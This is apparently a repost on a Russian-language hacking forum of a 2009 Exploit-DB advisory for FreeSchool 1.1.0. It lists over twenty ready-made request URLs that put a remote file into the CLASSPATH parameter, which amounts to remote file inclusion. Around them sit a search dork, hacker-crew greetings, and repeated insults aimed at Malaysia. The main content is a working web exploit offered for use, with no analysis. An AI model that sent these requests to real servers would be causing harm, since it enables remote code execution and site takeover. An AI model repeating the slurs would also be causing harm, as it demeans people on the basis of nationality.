Exploit FreeSchool 1.1.0 - Multiple Remote File Inclusions

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9582
Проверка EDB
  1. Пройдено
Автор
CR4WL3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4471
Дата публикации
2009-09-03
Код:
######################################################################
#[x] FreeSchool <= 1.1.0  Mutiple Remote File Include Vulnerability                    	  
#[!] Download Script      :  http://sourceforge.net/projects/freeschool/files/                      		  
#[!] Author               :  cr4wl3r                                   		  
#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org              		  
#[!] Location             :  Gorontalo - INDONESIA                     		  
#[!] Dork                 :  "FuCk y0u MaLaYsia"   		  
######################################################################

[x] 3xplo!t :                                                         		  
                                                                                  
http://localhost/[path]/biblioteca/bib_form.php?CLASSPATH=[AvriLhea]     
http://localhost/[path]/biblioteca/bib_pldetails.php?CLASSPATH=[AvriLhea]        
http://localhost/[path]/biblioteca/bib_plform.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_plsearchc.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_plsearchs.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_searchc.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_searchs.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/edi_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/edi_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/gen_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/gen_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/lin_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/lin_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/luo_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/luo_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/sog_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/sog_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/calendario/cal_insert.php?CLASSPATH=[AvriLhea]                                                                
http://localhost/[path]/calendario/cal_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/calendario/cal_saveactivity.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/circolari/cir_save.php?CLASSPATH=[AvriLhea]                                                                
http://localhost/[path]/modulistica/mdl_save.php?CLASSPATH=[AvriLhea]

######################################################################
#[!] Greetz : MyMom [alm]  
#                                                                        
#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers  
#
#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog
#
#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa
#
#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D
#
#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u??? 
#
#[!] sekuritionline.net | manadocoding.net                                          
######################################################################

# milw0rm.com [2009-09-03]
 
Источник
www.exploit-db.com

Похожие темы